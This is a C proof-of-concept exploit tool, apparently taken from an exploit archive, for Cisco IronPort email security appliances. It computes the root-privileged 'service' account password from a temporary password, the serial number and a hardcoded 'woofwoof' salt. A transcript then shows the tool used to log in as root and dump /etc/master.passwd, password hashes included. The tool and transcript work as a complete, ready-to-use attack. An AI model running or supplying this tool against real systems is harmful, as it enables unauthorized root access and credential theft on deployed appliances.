#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "getopt.h"
/* Size in bytes of the buffer in main() that holds the concatenated MD5 input. */
#define MAX_BUFFER 128
/*
 * Fixed string that main() appends to the temp password and serial number
 * before hashing. It is a compile-time constant, so the derivation carries no
 * per-device secret: the other two inputs are the temp password typed into
 * the enablediag "service" dialogue and the serial number that dialogue
 * prints (both visible in the transcript that follows the code).
 */
#define SECRET_PASS "woofwoof"
/* Prints the command-line help and exits the process. */
void usage(char *name);
/* Lowercases the ASCII letters 'A'-'Z' of str in place. */
void to_lower(char *str);
/* Rewrites '1' -> 'i', '0' -> 'o' and '_' -> '-' in str, in place. */
void fuzz_string(char *str);
/*
 * Derives and prints the "service" account password shown in the PoC
 * transcript: MD5(fuzz(temp password) + lowercase(serial) + SECRET_PASS),
 * cut down to the first four digest bytes (eight hex characters).
 *
 * Options: -p <temp password>, -s <serial number>, -h (help).
 * Returns 0 on every path that returns; usage() terminates the process itself.
 *
 * Defensive reading: the temp password and the serial number both appear in
 * the enablediag "service" dialogue, and the only other ingredient is the
 * compiled-in SECRET_PASS, so nothing in this derivation is secret per device.
 */
int main(int argc, char *argv[]) {
    char *password_arg = NULL;
    char *serial_arg = NULL;
    char material[MAX_BUFFER] = { 0 };  /* MD5 input: password + serial + secret */
    unsigned char digest[16] = { 0 };   /* full 128-bit MD5 output */
    int flag;

    if (argc < 2) {
        usage(argv[0]);
    }

    while ((flag = getopt(argc, argv, "p:s:h")) != -1) {
        if (flag == 'p') {
            password_arg = optarg;
        } else if (flag == 's') {
            serial_arg = optarg;
        } else if (flag == 'h') {
            usage(argv[0]);
        } else {
            /* Reports argv[1], which is not necessarily the option getopt rejected. */
            printf_s("Wrong Argument: %s\n", argv[1]);
        }
    }

    /* Any leftover positional argument is treated as a usage error. */
    if (optind < argc) {
        usage(argv[0]);
        exit(0);
    }

    if (password_arg == NULL || serial_arg == NULL) {
        usage(argv[0]);
        exit(0);
    }

    /*
     * NOTE(review): each length is compared with the buffer size on its own.
     * The combined string (plus SECRET_PASS and the terminator) can still
     * exceed MAX_BUFFER; only the size arguments passed to strcpy_s/strcat_s
     * bound the copy in that case, and their return values are not checked.
     */
    if (strlen(password_arg) > sizeof(material) || strlen(serial_arg) > sizeof(material)) {
        return 0;
    }

    /* Both normalisations edit the argv strings in place. */
    to_lower(serial_arg);
    fuzz_string(password_arg);

    strcpy_s(material, sizeof(material), password_arg);
    strcat_s(material, sizeof(material), serial_arg);
    strcat_s(material, sizeof(material), SECRET_PASS);

    MD5_CTX context;
    MD5_Init(&context);
    MD5_Update(&context, material, strlen(material));
    MD5_Final(digest, &context);

    /* Only sizeof(digest) - 12 = 4 bytes are printed: a 32-bit value in hex. */
    const size_t shown = sizeof(digest) - 12;
    printf_s("Service Password: ");
    for (size_t k = 0; k < shown; k++) {
        printf("%02x", digest[k]);
    }

    return 0;
}
/*
 * Substitutes three characters in str, in place: '1' becomes 'i', '0' becomes
 * 'o' and '_' becomes '-'. Every other character is left unchanged.
 * str must be a writable, NUL-terminated string.
 */
void fuzz_string(char *str) {
    for (char *cursor = str; *cursor != '\0'; cursor++) {
        if (*cursor == '1') {
            *cursor = 'i';
        } else if (*cursor == '0') {
            *cursor = 'o';
        } else if (*cursor == '_') {
            *cursor = '-';
        }
    }
}
/*
 * Lowercases str in place. Only bytes in the range 'A'..'Z' are changed, by
 * adding 0x20 (the ASCII distance between the two cases).
 * str must be a writable, NUL-terminated string.
 */
void to_lower(char *str) {
    for (; *str != '\0'; str++) {
        char ch = *str;
        if (ch < 'A' || ch > 'Z') {
            continue;
        }
        *str = (char)(ch + 0x20);
    }
}
/*
 * Prints the command-line help, using name as the program name in the usage
 * and example lines, then terminates the process with exit status 0.
 * This function does not return.
 */
void usage(char *name) {
    static const char *const option_lines[] = {
        " -p <password> | Cisco Service Temp Password\n",
        " -s <serial> | Cisco Serial Number\n",
        " -h | This Help Menu\n",
    };

    printf_s("\nUsage: %s -p password -s serial\n", name);
    for (size_t i = 0; i < sizeof option_lines / sizeof option_lines[0]; i++) {
        printf_s("%s", option_lines[i]);
    }
    printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
    exit(0);
}
- PoC:
- Enable Service Account
- ----------------------
- root@kali:~# ssh -lenablediag 192.168.0.158
- Password:
- Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
- Copyright (c) 2001-2013, Cisco Systems, Inc.
- AsyncOS 8.5.5 for Cisco C100V build 280
- Welcome to the Cisco C100V Email Security Virtual Appliance
- Available Commands:
- help -- View this text.
- quit -- Log out.
- service -- Enable or disable access to the service system.
- network -- Perform emergency configuration of the diagnostic network interface.
- clearnet -- Resets configuration of the diagnostic network interface.
- ssh -- Configure emergency SSH daemon on the diagnostic network interface.
- clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
- tunnel -- Start up tech support tunnel to IronPort.
- print -- Print status of the diagnostic network interface.
- reboot -- Reboot the appliance.
- S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
- Service Access currently disabled.
- ironport.example.com> service
- Service Access is currently disabled. Enabling this system will allow an
- IronPort Customer Support representative to remotely access your system
- to assist you in solving your technical issues. Are you sure you want
- to do this? [Y/N]> Y
- Enter a temporary password for customer support to use. This password may
- not be the same as your admin password. This password will not be able
- to be used to directly access your system.
- []> cisco123
- Service access has been ENABLED. Please provide your temporary password
- to your IronPort Customer Support representative.
- S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
- Service Access currently ENABLED (0 current service logins)
- ironport.example.com>
- Generate Service Account Password
- ---------------------------------
- Y:\Vulnerabilities\cisco\ironport>woofwoof.exe
- Usage: woofwoof.exe -p password -s serial
- -p <password> | Cisco Service Temp Password
- -s <serial> | Cisco Serial Number
- -h | This Help Menu
- Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
- Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
- F508A4
- Service Password: b213c9a4
- Login to the appliance as Service account with root privileges
- --------------------------------------------------------------
- root@kali:~# ssh -lservice 192.168.0.158
- Password:
- Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
- Copyright (c) 2001-2013, Cisco Systems, Inc.
- AsyncOS 8.5.5 for Cisco C100V build 280
- Welcome to the Cisco C100V Email Security Virtual Appliance
- # uname -a
- FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014
- auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
- # cat /etc/master.passwd
- # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
- root:*:0:0::0:0:Mr &:/root:/sbin/nologin
- service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
- enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access
- control:/root:/data/bin/enablediag.sh
- adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password
- Tool:/data/home/admin:/data/bin/adminpassword.sh
- daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
- operator:*:2:5::0:0:System &:/:/sbin/nologin
- bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
- tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
- kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
- man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
- sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
- nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
- support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
- admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
- clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
- smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
- spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
- pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
- ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
- */
- # 0day.today [2018-04-14] #